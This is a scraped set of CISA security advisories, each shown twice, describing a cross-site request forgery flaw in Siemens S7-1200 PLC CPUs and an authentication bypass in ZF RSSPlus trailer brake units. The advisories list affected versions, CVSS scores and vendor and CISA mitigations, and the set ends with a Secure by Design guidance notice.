SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214C DC/DC/DC RAIL (6AG2214-1AG40-1XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215C DC/DC/DC (6AG1215-1AG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215FC DC/DC/DC (6AG1215-1AF40-5XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0): Versions prior to V4.7

3.2 VULNERABILITY OVERVIEW
3.2.1 CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
The web interface of the affected devices is vulnerable to cross-site request forgery (CSRF) attacks. This could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.
CVE-2024-47100 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-47100. A base score of 7.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER
David Henrique Estevam de Andrade reported this vulnerability to Siemens.
4. MITIGATIONS
Siemens has released new versions for the affected products and recommends updating to the latest versions:

SIMATIC S7-1200 CPU: Update to V4.7 or later version.
SIPLUS S7-1200 CPU: Update to V4.7 or later version.

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

Do not click on links from untrusted sources.

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-717113 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

January 21, 2025: Initial Publication 

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 7.2
• ATTENTION: Exploitable remotely/low attack complexity
• Vendor: Siemens
• Equipment: SIMATIC S7-1200 CPUs
• Vulnerability: Cross-Site Request Forgery

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Siemens reports that the following products are affected:

• SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214C DC/DC/DC RAIL (6AG2214-1AG40-1XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215C DC/DC/DC (6AG1215-1AG40-5XB0): Versions prior to V4.7
• SIPLUS S7-1200 CPU 1215FC DC/DC/DC (6AG1215-1AF40-5XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0): Versions prior to V4.7
• SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0): Versions prior to V4.7

3.2 VULNERABILITY OVERVIEW

3.2.1 CROSS-SITE REQUEST FORGERY (CSRF) CWE-352

The web interface of the affected devices is vulnerable to cross-site request forgery (CSRF) attacks. This could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.

CVE-2024-47100 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H).

A CVSS v4 score has also been calculated for CVE-2024-47100. A base score of 7.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

David Henrique Estevam de Andrade reported this vulnerability to Siemens.

4. MITIGATIONS

Siemens has released new versions for the affected products and recommends updating to the latest versions:

• SIMATIC S7-1200 CPU: Update to V4.7 or later version.
• SIPLUS S7-1200 CPU: Update to V4.7 or later version.

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

• Do not click on links from untrusted sources.

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.

Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage

For more information see the associated Siemens security advisory SSA-717113 in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• January 21, 2025: Initial Publication

 Read More

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 5.9
ATTENTION: Exploitable from an adjacent network/low attack complexity
Vendor: ZF
Equipment: RSSPlus
Vulnerability: Authentication Bypass By Primary Weakness

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an unauthenticated attacker to remotely (proximal/adjacent with RF equipment) call diagnostic functions which could impact both the availability and integrity.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of RSSPlus are affected:

RSSPlus 2M: build dates 01/08 through at least 01/23

3.2 VULNERABILITY OVERVIEW
3.2.1 AUTHENTICATION BYPASS BY PRIMARY WEAKNESS CWE-305
The affected product is vulnerable to an authentication bypass vulnerability targeting deterministic RSSPlus SecurityAccess service seeds, which may allow an attacker to remotely (proximal/adjacent with RF equipment or via pivot from J2497 telematics devices) call diagnostic functions intended for workshop or repair scenarios. This can impact system availability, potentially degrading performance or erasing software, however the vehicle remains in a safe vehicle state.
CVE-2024-12054 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.4 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-12054. A base score of 5.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER
National Motor Freight Traffic Association, Inc. (NMFTA) researchers Ben Gardiner and Anne Zachos reported this vulnerability to CISA.
4. MITIGATIONS
To most effectively mitigate general vulnerabilities of the powerline communication, any trucks, trailers, and tractors utilizing J2497 technology should disable all features where possible, except for backwards-compatibility with LAMP ON detection only. Users acquiring new trailer equipment should migrate all diagnostics to newer trailer bus technology. Users acquiring new tractor equipment should remove support for reception of any J2497 message other than LAMP messages.
ZF recommends:

Moving away from security access and implementing the latest security feature authenticate (0x29)
Ensure random numbers are generated from a cryptographically secure hardware true random number generator
Adopting modern standards/protocols for truck trailer communication

NMFTA has published detailed information about how to mitigate these issues in the following ways:

Install a LAMP ON firewall for each ECU
Use a LAMP detect circuit LAMP ON sender with each trailer
Change addresses dynamically on each tractor in response to detecting a transmitter on its current address.
Install RF chokes on each trailer between chassis ground and wiring ground
Load with LAMP keyhole signal on each tractor
Flood with jamming signal on each tractor

Please visit NMFTA for additional details on these and other solutions.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

January 21, 2025: Initial Publication 

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 5.9
• ATTENTION: Exploitable from an adjacent network/low attack complexity
• Vendor: ZF
• Equipment: RSSPlus
• Vulnerability: Authentication Bypass By Primary Weakness

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an unauthenticated attacker to remotely (proximal/adjacent with RF equipment) call diagnostic functions which could impact both the availability and integrity.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of RSSPlus are affected:

• RSSPlus 2M: build dates 01/08 through at least 01/23

3.2 VULNERABILITY OVERVIEW

3.2.1 AUTHENTICATION BYPASS BY PRIMARY WEAKNESS CWE-305

The affected product is vulnerable to an authentication bypass vulnerability targeting deterministic RSSPlus SecurityAccess service seeds, which may allow an attacker to remotely (proximal/adjacent with RF equipment or via pivot from J2497 telematics devices) call diagnostic functions intended for workshop or repair scenarios. This can impact system availability, potentially degrading performance or erasing software, however the vehicle remains in a safe vehicle state.

CVE-2024-12054 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.4 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H).

A CVSS v4 score has also been calculated for CVE-2024-12054. A base score of 5.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

National Motor Freight Traffic Association, Inc. (NMFTA) researchers Ben Gardiner and Anne Zachos reported this vulnerability to CISA.

4. MITIGATIONS

To most effectively mitigate general vulnerabilities of the powerline communication, any trucks, trailers, and tractors utilizing J2497 technology should disable all features where possible, except for backwards-compatibility with LAMP ON detection only. Users acquiring new trailer equipment should migrate all diagnostics to newer trailer bus technology. Users acquiring new tractor equipment should remove support for reception of any J2497 message other than LAMP messages.

ZF recommends:

• Moving away from security access and implementing the latest security feature authenticate (0x29)
• Ensure random numbers are generated from a cryptographically secure hardware true random number generator
• Adopting modern standards/protocols for truck trailer communication

NMFTA has published detailed information about how to mitigate these issues in the following ways:

• Install a LAMP ON firewall for each ECU
• Use a LAMP detect circuit LAMP ON sender with each trailer
• Change addresses dynamically on each tractor in response to detecting a transmitter on its current address.
• Install RF chokes on each trailer between chassis ground and wiring ground
• Load with LAMP keyhole signal on each tractor
• Flood with jamming signal on each tractor

Please visit NMFTA for additional details on these and other solutions.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

• January 21, 2025: Initial Publication

 Read More

 ​In partnership with the Federal Bureau of Investigation (FBI), CISA released an update to joint guidance Product Security Bad Practices in furtherance of CISA’s Secure by Design initiative. This updated guidance incorporates public comments CISA received in response to a Request for Information, adding additional bad practices, context regarding memory-safe languages, clarifying timelines for patching Known Exploited Vulnerabilities (KEVs), and other recommendations.
While this voluntary guidance is intended for software manufacturers who develop software products and services in support of critical infrastructure, all software manufacturers are strongly encouraged to avoid these product security bad practices.
CISA and FBI urge software manufacturers to reduce customer risk by prioritizing security throughout the product development process. For more information and resources, visit CISA’s Secure by Design webpage or learn how to take CISA’s Secure by Design Pledge. 

In partnership with the Federal Bureau of Investigation (FBI), CISA released an update to joint guidance Product Security Bad Practices in furtherance of CISA’s Secure by Design initiative. This updated guidance incorporates public comments CISA received in response to a Request for Information, adding additional bad practices, context regarding memory-safe languages, clarifying timelines for patching Known Exploited Vulnerabilities (KEVs), and other recommendations.

While this voluntary guidance is intended for software manufacturers who develop software products and services in support of critical infrastructure, all software manufacturers are strongly encouraged to avoid these product security bad practices.

CISA and FBI urge software manufacturers to reduce customer risk by prioritizing security throughout the product development process. For more information and resources, visit CISA’s Secure by Design webpage or learn how to take CISA’s Secure by Design Pledge.

 Read More